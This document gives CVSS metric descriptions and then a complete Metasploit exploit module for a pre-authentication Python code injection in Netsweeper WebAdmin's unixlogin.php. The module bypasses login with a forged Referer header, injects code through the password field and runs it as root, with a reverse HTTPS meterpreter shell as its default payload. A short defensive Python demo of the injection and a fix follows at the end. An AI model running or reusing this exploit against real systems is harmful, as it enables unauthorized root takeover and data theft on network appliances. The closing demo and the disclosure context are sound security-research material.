The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
High
AC
The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include:

Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful.

Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Netsweeper WebAdmin unixlogin.php Python Code Injection
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Netsweeper WebAdmin unixlogin.php Python Code Injection',
        'Description' => %q{
          This module exploits a Python code injection in the Netsweeper
          WebAdmin component's unixlogin.php script, for versions 6.4.4 and
          prior, to execute code as the root user.

          Authentication is bypassed by sending a random whitelisted Referer
          header in each request.

          Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
          Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
          been confirmed exploitable.
        },
        'Author' => [
          # Reported to SecuriTeam SSD by an anonymous researcher
          # Reference exploit written by said anonymous researcher
          # Publicly disclosed by Noam Rathaus of SecuriTeam's SSD
          'wvu' # Module
        ],
        'References' => [
          ['URL', 'https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/'],
          ['URL', 'https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says']
        ],
        'DisclosureDate' => '2020-04-28', # SecuriTeam SSD advisory
        'License' => MSF_LICENSE,
        'Platform' => 'python',
        'Arch' => ARCH_PYTHON,
        'Privileged' => true,
        'Targets' => [['Python', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'PAYLOAD' => 'python/meterpreter/reverse_https'
        },
        'Notes' => {
          'NOCVE' => 'Publicly disclosed via SecuriTeam SSD advisory',
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,
                             '/webadmin/tools/systemstatus_remote.php'),
      'headers' => {
        'Referer' => rand_referer(:check) # Auth bypass via Referer header
      }
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 200
      return CheckCode::Unknown('Target is not running Netsweeper.')
    end

    if res.body.include?('Permission Denied: Unauthorized access.')
      return CheckCode::Safe('Target has rejected our Referer auth bypass.')
    end

    # Example version information from /webadmin/tools/systemstatus_remote.php:
    #   Version: 6.4.3
    #   Build Date: 2020-03-27 14:15:19
    #   Database Version: 139
    unless (version = res.body.scan(/^Version: ([\d.]+)$/).flatten.first)
      return CheckCode::Detected(
        'Target did not respond with Netsweeper version.'
      )
    end

    if Gem::Version.new(version) <= Gem::Version.new('6.4.4')
      return CheckCode::Appears(
        "Netsweeper #{version} is a vulnerable version."
      )
    end

    CheckCode::Safe("Netsweeper #{version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    referer = rand_referer(:exploit)

    vprint_status("Selecting random whitelisted Referer header: #{referer}")
    vprint_status("Injecting Python code into password field: #{fake_password}")

    normie_uri = normalize_uri(target_uri.path, '/webadmin/tools/unixlogin.php')

    print_status("Sending #{datastore['PAYLOAD']} to #{full_uri(normie_uri)}")

    # The application may block on the payload, so time out reasonably soon
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normie_uri,
      'headers' => {
        'Referer' => referer
      },
      'vars_post' => {
        'login' => '.', # Bypass user check by injecting `grep . /etc/shadow'
        'password' => fake_password
      }
    }, 3.5)

    return unless res

    # An unexpected reply typically means some sort of error, so print it out
    fail_with(Failure::UnexpectedReply, res.body)
  end

  def fake_password
    return @fake_password if @fake_password

    # Arguments for crypt.crypt(): https://docs.python.org/2/library/crypt.html
    word = rand_text_alphanumeric(8..42)
    salt = rand_text_alphanumeric(2) # This is DES-safe because we remove algo

    # Python code injection occurs in the $2 positional parameter from sh(1):
    # password=$($PYTHON -c "import crypt; print crypt.crypt('$2', '\$$algo\$$salt\$')")
    @fake_password = "#{word}', '#{salt}'); #{payload.encoded} #"
  end

  # Select a random Referer [sic] header value from an appropriate whitelist
  def rand_referer(method = :check)
    case method
    when :check
      %w[
        webadmin/admin/systemstatus_inc_data.php
        webadmin/api/
        webadmin/common/systemstatus_overview_ajax.php
      ].sample
    when :exploit
      %w[
        systemconfig/edit_database_settings.php
        systemconfig/edit_file.php
        systemconfig/manage_certs.php
        webadmin/admin/service_manager_data.php
        webadmin/api/
        webadmin/systemconfig/edit_email_sending_settings.php
        webadmin/systemconfig/grant_db_access.php
      ].sample
    else
      fail_with(Failure::BadConfig,
                "I don't know how to #{method}, but I do know how to love")
    end
  end
end
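The root cause the module's fake_password comment points at is that the submitted password is interpolated into the source text of a `python -c` one-liner. The following is an added illustration, not the module's code or Netsweeper's script: the one-liner is a Python 3 rendering of the comment's template (hash assigned to a variable before printing, so the parser can examine it), an inert `injected = True` stands in for the payload, and the hardened variant passes the password as its own argv element so it is never re-parsed as code.

```python
import ast
import subprocess
import sys

# Constructed stand-in for the vulnerable one-liner: the password is pasted
# straight into Python source, exactly the mistake the module abuses.
def vulnerable_program(password: str, algo: str = "6", salt: str = "ab") -> str:
    return f"import crypt; h = crypt.crypt('{password}', '${algo}${salt}$'); print(h)"

def top_level_statements(program: str) -> list:
    """Parse the generated one-liner and list its top-level statements.

    A well-formed password yields import / assign / print. Anything else
    means the password closed the string literal and added statements.
    """
    return [ast.unparse(stmt) for stmt in ast.parse(program).body]

# Hardened form: the password and the salt spec are separate argv elements,
# so quotes, ';' and '#' inside them remain plain data.
SAFE_PROGRAM = "import crypt, sys; print(crypt.crypt(sys.argv[1], sys.argv[2]))"

def safe_command(password: str, algo: str = "6", salt: str = "ab") -> list:
    return [sys.executable, "-c", SAFE_PROGRAM, password, f"${algo}${salt}$"]

def password_seen_by_safe_child(password: str) -> str:
    # Run the safe argv layout with an echo program in place of SAFE_PROGRAM
    # (avoids the crypt module, which recent Pythons no longer ship) to show
    # the child receives the password verbatim instead of executing it.
    cmd = safe_command(password)
    cmd[2] = "import sys; sys.stdout.write(sys.argv[1])"
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout

# Constructed sample in the shape the module builds: word', 'salt'); <code> #
INJECTED_PASSWORD = "hunter2', 'ab'); injected = True #"

if __name__ == "__main__":
    print(top_level_statements(vulnerable_program("hunter2")))
    print(top_level_statements(vulnerable_program(INJECTED_PASSWORD)))
    print(repr(password_seen_by_safe_child(INJECTED_PASSWORD)))
```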